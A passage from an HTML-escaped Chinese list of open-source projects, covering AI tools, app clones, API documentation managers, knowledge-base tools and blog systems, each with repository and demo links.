            &lt;a href=&quot;https://github.com/SoraWebui/SoraWebui&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SoraWebui&lt;/a&gt; - 一个开源项目，允许用户使用 &lt;code&gt;OpenAI&lt;/code&gt; 的 &lt;code&gt;Sora&lt;/code&gt; 模型使用文本在线生成视频。&lt;a href=&quot;https://sorawebui.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/songquanpeng/one-api&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;one-api&lt;/a&gt; - &lt;code&gt;OpenAI&lt;/code&gt; 接口管理 &amp;amp; 分发系统，已打包好 &lt;code&gt;Docker&lt;/code&gt; 镜像，一键部署，开箱即用。&lt;a href=&quot;https://openai.justsong.cn/panel&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/liou666/polyglot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;polyglot&lt;/a&gt; - 跨平台 &lt;code&gt;AI&lt;/code&gt; 语言练习应用。&lt;a href=&quot;https://polyglotai.xyz/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/idootop/mi-gpt&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mi-gpt&lt;/a&gt; - 将小爱音箱接入 &lt;code&gt;ChatGPT&lt;/code&gt; 和豆包，改造成你的专属语音助手。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zhayujie/chatgpt-on-wechat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;chatgpt-on-wechat&lt;/a&gt; - 基于大模型搭建的聊天机器人，同时支持微信公众号、企业微信应用、飞书、钉钉等接入。&lt;a href=&quot;https://docs.link-ai.tech/cow/quick-start&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;高仿项目&quot;&gt;
    &lt;a href=&quot;?id=%e9%ab%98%e4%bb%bf%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;高仿项目&quot;&gt;高仿项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/microapp-store/flash-waimai&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;flash-waimai&lt;/a&gt; - 基于 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; 前后端分离仿照饿了么的&lt;strong&gt;外卖平台&lt;/strong&gt;，包括手机端，后台管理。&lt;a href=&quot;http://waimai-mobile.microapp.store/#/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://microapp.gitee.io/flash-waimai/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/xzjsccz/yanhuo-springboot-vue&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;yanhuo-springboot-vue&lt;/a&gt; - 一个基于微服务架构的前后端分离仿小红书项目。&lt;a href=&quot;http://175.178.249.190/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sl1673495/vue-netease-music&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-netease-music&lt;/a&gt; - 基于 &lt;code&gt;Vue2&lt;/code&gt;、&lt;code&gt;Vue-CLI3&lt;/code&gt; 的&lt;strong&gt;高仿网易云&lt;/strong&gt; &lt;code&gt;Mac&lt;/code&gt; 客户端播放器（&lt;code&gt;PC&lt;/code&gt;） &lt;code&gt;Online Music Player&lt;/code&gt;。&lt;a href=&quot;https://v-music.vercel.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xuqiang521/nuxt-ssr-demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nuxt-ssr-demo&lt;/a&gt; - 一个基于 &lt;code&gt;Nuxt&lt;/code&gt; 的服务器端渲染的高仿掘金项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zhaohaodang/vue-WeChat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-WeChat&lt;/a&gt; - 基于 &lt;code&gt;Vue2.0&lt;/code&gt; 高仿微信 &lt;code&gt;App&lt;/code&gt; 的单页应用。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bailicangdu/vue2-elm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue2-elm&lt;/a&gt; - 一个具有 45 个页面的大型模仿饿了么单页面应用。&lt;a href=&quot;https://cangdu.org/elm/#/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/SmallRuralDog/vue3-music&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue3-music&lt;/a&gt; - &amp;nbsp;&lt;code&gt;VUE3&lt;/code&gt; + &lt;code&gt;TS&lt;/code&gt; 开发的&lt;strong&gt;音乐播放器&lt;/strong&gt;，界面模仿 &lt;code&gt;QQ&lt;/code&gt; 音乐 &lt;code&gt;Mac&lt;/code&gt; 客户端，支持黑夜模式。&lt;a href=&quot;https://smallruraldog.github.io/vue3-music&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/path-yu/vue3-cloud-music&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue3-cloud-music&lt;/a&gt; - 一个主要基于 &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;TypeScript&lt;/code&gt; + &lt;code&gt;Vite&lt;/code&gt; 构建的高仿网易云 &lt;code&gt;pc&lt;/code&gt; 端的音乐流媒体网站。&lt;a href=&quot;https://cloud-music-eight-nu.vercel.app/#/discovery&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zyronon/douyin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;douyin&lt;/a&gt; - 一个模仿抖音的移动端短视频项目，它基于 &lt;code&gt;Vue&lt;/code&gt;、&lt;code&gt;Vite&lt;/code&gt;实现。&lt;a href=&quot;http://dy.ttentau.top/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Sandermoen/instaclone&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;instaclone&lt;/a&gt; - 基于 &lt;code&gt;MongoDB&lt;/code&gt;、&lt;code&gt;Express&lt;/code&gt;、&lt;code&gt;React&lt;/code&gt;、&lt;code&gt;Socket.io&lt;/code&gt; 模仿 &lt;code&gt;Instagram&lt;/code&gt; 的项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zwStar/vue-meituan&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-meituan&lt;/a&gt; - &lt;code&gt;Vue&lt;/code&gt; + &lt;code&gt;Node&lt;/code&gt; + &lt;code&gt;MongoDB&lt;/code&gt; 仿美团外卖点餐系统带支付功能。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hai-27/vue-store&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-store&lt;/a&gt; - 基于 &lt;code&gt;Vue&lt;/code&gt; + &lt;code&gt;Vue-Router&lt;/code&gt; + &lt;code&gt;Vuex&lt;/code&gt; + &lt;code&gt;Element-UI&lt;/code&gt; + &lt;code&gt;Axios&lt;/code&gt;，仿小米商城实现的&lt;strong&gt;电商项目&lt;/strong&gt;。&lt;a href=&quot;http://8.141.3.248/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/guozhigq/pilipala&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pilipala&lt;/a&gt; - 使用 &lt;code&gt;Flutter&lt;/code&gt; 开发的 &lt;code&gt;BiliBili&lt;/code&gt; 第三方客户端。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dxx/react-bilibili&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;react-bilibili&lt;/a&gt; - 高仿B站 &lt;code&gt;web&lt;/code&gt; 移动端。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nageoffer/12306&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;12306&lt;/a&gt; - 仿 12306 铁路购票系统。&lt;a href=&quot;http://12306.magestack.cn&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://nageoffer.com/12306/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jigar-sable/instagram-mern&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;instagram-mern&lt;/a&gt; - 仿 &lt;code&gt;Instagram&lt;/code&gt; 项目。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;接口文档管理项目&quot;&gt;
    &lt;a href=&quot;?id=%e6%8e%a5%e5%8f%a3%e6%96%87%e6%a1%a3%e7%ae%a1%e7%90%86%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;接口文档管理项目&quot;&gt;接口文档管理项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/durcframework/torna&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Torna&lt;/a&gt; - &lt;strong&gt;接口文档&lt;/strong&gt;解决方案，目标是让接口文档管理变得更加方便、快捷。&lt;code&gt;Torna&lt;/code&gt; 采用团队协作的方式管理和维护接口文档，将不同形式的文档纳入进来统一维护。&lt;a href=&quot;https://torna.cn/dev/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/postcatlab/postcat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;postcat&lt;/a&gt; - 可扩展的 &lt;code&gt;API&lt;/code&gt; 工具平台，集成基础的 &lt;code&gt;API&lt;/code&gt; 管理和测试功能，并且可以通过插件简化 &lt;code&gt;API&lt;/code&gt; 开发工作，更快更好地创建 &lt;code&gt;API&lt;/code&gt;。&lt;a href=&quot;https://postcat.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.postcat.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/DOClever/DOClever&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;DOClever&lt;/a&gt; - 接口管理平台。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/YMFE/yapi&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;yapi&lt;/a&gt; - 一个可本地部署的、打通前后端及QA的、可视化的&lt;strong&gt;接口管理平台&lt;/strong&gt;。&lt;a href=&quot;http://yapi.smart-xwork.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://hellosean1025.github.io/yapi&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/zyplayer/zyplayer-doc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;zyplayer-doc&lt;/a&gt; - 一款适合团队和个人使用的 &lt;code&gt;WIKI&lt;/code&gt; &lt;strong&gt;文档管理工具&lt;/strong&gt;，同时还包含数据库文档、&lt;code&gt;Api&lt;/code&gt; 接口文档。&lt;a href=&quot;https://gitee.com/link?target=http%3A%2F%2Fdoc.zyplayer.com%2F&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &amp;nbsp;账号：&lt;code&gt;zyplayer&lt;/code&gt; 密码：&lt;code&gt;123456&lt;/code&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/thx/rap2-delos&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;rap2-delos&lt;/a&gt; - 阿里妈妈前端团队出品的&lt;strong&gt;开源接口管理工具&lt;/strong&gt; &lt;code&gt;RAP&lt;/code&gt;第二代。&lt;a href=&quot;http://rap2.taobao.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Kong/insomnia&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;insomnia&lt;/a&gt; - 一个开源的、跨平台的 &lt;code&gt;GraphQL&lt;/code&gt;、&lt;code&gt;REST&lt;/code&gt;、&lt;code&gt;WebSockets&lt;/code&gt; 和 &lt;code&gt;gRPC&lt;/code&gt; 的 &lt;code&gt;API&lt;/code&gt; 客户端。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/EhsanTang/ApiManager&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ApiManager&lt;/a&gt; - 一个由 &lt;code&gt;Angular.js&lt;/code&gt; + &lt;code&gt;Bootstrap&lt;/code&gt; + &lt;code&gt;SpringMVC&lt;/code&gt; + &lt;code&gt;MyBatis&lt;/code&gt; 搭建的免费开源的 &lt;code&gt;API&lt;/code&gt; 接口管理系统、&lt;code&gt;BUG&lt;/code&gt; 管理系统、文档管理系统（应用接口管理系统）。&lt;a href=&quot;https://crap.cn/home.do&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/star7th/showdoc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;showdoc&lt;/a&gt; - 一个非常适合IT团队的在线 &lt;code&gt;API&lt;/code&gt; 文档、技术文档工具。&lt;a href=&quot;https://www.showdoc.com.cn/demo/10344910536452840&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.showdoc.com.cn/help/1385767280275683&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/brookshi/Hitchhiker&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Hitchhiker&lt;/a&gt; - &lt;code&gt;Restful Api&lt;/code&gt; 测试工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mindoc-org/mindoc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mindoc&lt;/a&gt; - &lt;code&gt;Go&lt;/code&gt; 实现的基于 &lt;code&gt;beego&lt;/code&gt; 框架的接口在线文档管理系统。&lt;a href=&quot;https://mindoc.com.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://mindoc.com.cn/docs/mindochelp&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xuxueli/xxl-api&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;xxl-api&lt;/a&gt; - &lt;code&gt;API&lt;/code&gt; 管理平台。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/trueleaf/moyu&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;moyu&lt;/a&gt; - 基于 &lt;code&gt;Vue&lt;/code&gt; 和 &lt;code&gt;Electron&lt;/code&gt; 的在线协同 &lt;code&gt;Api&lt;/code&gt; 接口管理工具。&lt;a href=&quot;https://online.jobtool.cn/#/v1/apidoc/doc-list&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;知识管理项目&quot;&gt;
    &lt;a href=&quot;?id=%e7%9f%a5%e8%af%86%e7%ae%a1%e7%90%86%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;知识管理项目&quot;&gt;知识管理项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/fantasticit/think&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;think&lt;/a&gt; - 一款开源&lt;strong&gt;知识管理工具&lt;/strong&gt;。通过独立的知识库空间，结构化地组织在线协作文档，实现知识的积累与沉淀，促进知识的复用与流通。基于 &lt;code&gt;MySQL&lt;/code&gt; 存储 + &lt;code&gt;next.js&lt;/code&gt; 前端页面 + &lt;code&gt;nest.js&lt;/code&gt; 服务端 + &lt;code&gt;tiptap&lt;/code&gt; 编辑器及文档协作。&lt;a href=&quot;https://think.codingit.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://think.codingit.cn/share/wiki/WoiR8N5uj4i7&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/requarks/wiki&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;wiki&lt;/a&gt; - 一款基于 &lt;code&gt;Node.js&lt;/code&gt; 的开源&lt;strong&gt;知识管理工具&lt;/strong&gt;。&lt;a href=&quot;https://docs.requarks.io/demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/logseq/logseq&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;logseq&lt;/a&gt; - 一个隐私至上的知&lt;strong&gt;识管理和协作的开源平台&lt;/strong&gt;。&lt;a href=&quot;https://trello.com/b/8txSM12G/logseq-roadmap&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/usememos/memos&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;memos&lt;/a&gt; - 一个具有知识管理和社交网络的开源、自我托管的备忘录中心。&lt;a href=&quot;https://demo.usememos.com/explore&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/siyuan-note/siyuan&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;siyuan&lt;/a&gt; - 一款本地优先的个人&lt;strong&gt;知识管理系统&lt;/strong&gt;， 支持细粒度块级引用和 &lt;code&gt;Markdown&lt;/code&gt; 所见即所得。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/BoostIO/BoostNote-App&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;BoostNote-App&lt;/a&gt; - 一个文件驱动的&lt;code&gt;项目管理工具&lt;/code&gt;，可以最大限度地提高远程 &lt;code&gt;DevOps&lt;/code&gt; 团队的速度。&lt;a href=&quot;https://boostnote.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mkdocs/mkdocs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mkdocs&lt;/a&gt; - 一个快速、简单和完全华丽的&lt;strong&gt;静态网站生成器&lt;/strong&gt;，主要用于构建项目文档。文档源文件用 &lt;code&gt;Markdown&lt;/code&gt; 编写，并通过一个 &lt;code&gt;YAML&lt;/code&gt; 配置文件进行配置。&lt;a href=&quot;https://www.mkdocs.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/doczjs/docz&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;docz&lt;/a&gt; - 通过 &lt;code&gt;MDX&lt;/code&gt; 快速创建实时加载、&lt;code&gt;SEO&lt;/code&gt; 友好、可生产的文档网站，并通过利用 &lt;code&gt;GatsbyJS&lt;/code&gt; 和 &lt;code&gt;Gatsby&lt;/code&gt; 主题阴影，在需要时定制其外观、感觉和行为。&lt;a href=&quot;https://www.docz.site/docs/introduction&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/facebook/docusaurus&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;docusaurus&lt;/a&gt; - 易于维护的&lt;strong&gt;开源文档网站&lt;/strong&gt;。&lt;a href=&quot;https://docusaurus.io/zh-CN/docs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zmister2016/MrDoc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MrDoc&lt;/a&gt; - 觅思文档，适合于个人和中小型团队的在线文档、知识库系统。&lt;a href=&quot;http://mrdoc.zmister.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/phachon/mm-wiki&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mm-wiki&lt;/a&gt; - 轻量级的&lt;strong&gt;企业知识分享与团队协同软件&lt;/strong&gt;，可用于快速构建企业 &lt;code&gt;Wiki&lt;/code&gt; 和团队知识分享平台。&lt;a href=&quot;http://wiki.cifaz.com/author/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/BookStackApp/BookStack&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;BookStack&lt;/a&gt; - 基于 &lt;code&gt;PHP&lt;/code&gt; 和 &lt;code&gt;Laravel&lt;/code&gt; 的 &lt;code&gt;Wiki&lt;/code&gt; 平台。&lt;a href=&quot;https://demo.bookstackapp.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/outline/outline&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;outline&lt;/a&gt; - 一款基于 &lt;code&gt;React&lt;/code&gt; 和 &lt;code&gt;Node.js&lt;/code&gt; 开发的开源文档和团队知识库管理工具。&lt;a href=&quot;https://docs.getoutline.com/s/guide&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/toeverything/AFFiNE&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;AFFiNE&lt;/a&gt; - 一个集规划、分类和创建于一体的下一代知识库。&lt;a href=&quot;https://app.affine.pro/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;博客项目&quot;&gt;
    &lt;a href=&quot;?id=%e5%8d%9a%e5%ae%a2%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;博客项目&quot;&gt;博客项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/halo-dev/halo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;halo&lt;/a&gt; - 强大易用的开源建站工具。&lt;a href=&quot;https://demo.halo.run&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.halo.run/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/liangliangyy/DjangoBlog&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;DjangoBlog&lt;/a&gt; - 基于 &lt;code&gt;Django&lt;/code&gt; 的博客系统。&lt;a href=&quot;https://www.lylinux.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
